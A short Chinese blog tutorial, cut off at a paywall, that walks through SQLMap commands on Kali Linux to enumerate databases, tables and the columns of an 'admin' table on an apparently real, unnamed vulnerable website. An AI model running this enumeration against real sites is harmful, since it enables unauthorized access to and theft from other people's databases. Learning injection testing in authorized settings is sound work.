SQLMap扫描不安全web网站的流程
首先收集到目标的网址 此处我不做展示
打开linux 上的终端输入 sqlmap -u "url" 对目标网址进行扫描
发现目标存在漏洞(其id是可注入的)

接着我们输入sqlmap -u "url" --dbs 来查询目标的数据库 我查询到了三个

接着我们来看一些我们所浏览的页面(url)在哪个数据库中
输入sqlmap -u "url" --current-db 发现在 maoshe中

接着我们来查询maoshe中的数据表
输入sqlmap -u "url" -D "maoshe" --tables

发现其数据库下有四个表 然后我们来浏览数据表中的字段(我这里查询的是admin数据表中的字段)
输入sqlmap -u "url" -D "maoshe" -T "admin" --columns

本文介绍了如何在Kali Linux上利用SQLMap工具对存在SQL注入漏洞的web网站进行数据库扫描。通过收集目标网址,进行初步扫描,确定数据库存在,接着查询数据库名、数据表及字段信息,最终揭示了数据库字段中的敏感信息。这是一个测试案例,提醒读者在实际操作时要考虑可能的法律风险。
最低0.47元/天 解锁文章
1万+

被折叠的 条评论
为什么被折叠?



